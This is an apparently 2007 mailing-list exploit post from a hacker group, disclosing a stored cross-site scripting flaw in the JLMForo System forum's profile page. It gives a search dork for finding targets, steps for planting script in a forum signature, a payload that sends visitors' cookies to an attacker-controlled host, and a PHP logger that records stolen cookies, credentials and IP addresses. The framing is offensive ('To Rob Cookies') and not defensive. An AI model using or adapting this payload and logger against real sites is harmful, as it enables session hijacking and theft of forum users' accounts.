JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

sys-project Mon, 26 Nov 2007 13:51:53 -0800

# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

# Download:


# http://www.miscodigos.com/aplicaciones/JLMForo%20System/

# Bug found by Jose Luis Góngora Fernández / JosS

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team

# www.spanish-hackers.com

# /server irc.freenode.net /join #fullsecure

# d0rk: "Powered By JLMForo System"

# Stop lammer


# Explanation Basic :


1.- Register in the forum (registro.php)

2.- Put in your signature the XSS (modificarPerfil.php)

3.- Create a subject

4.- Wait to an answer to visualize the XSS


# To Rob Cookies:


1º- Register in the forum (registro.php)


2º- Put in your signature the XSS (modificarPerfil.php):


<script>window.location=http://yousite.com/xss.php?cookie=+document.cookie</script>


3º- Upload in your Site:


<?php

$archivo = fopen('log2.htm','a');//Aquí podemos cambiar el nombre del archivo a 
crear

$cookie = $_GET['c'];

$usuario = $_GET['id']; 

$ip = getenv ('REMOTE_ADDR');

$re = $HTTPREFERRER;


$fecha=date("j F, Y, g:i a");

fwrite($archivo, '<hr>USUARIO Y PASSWORD: 
'.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> 


IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');

fclose($archivo);

?>


4º- Chmod 777 archive


5º- Create a subject


6º- Wait to an answer to run the XSS


 //---------------------------------------\\


Greetz To: All Hackers

Jose Luis Góngora Fernández / JosS!

JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

Reply via email to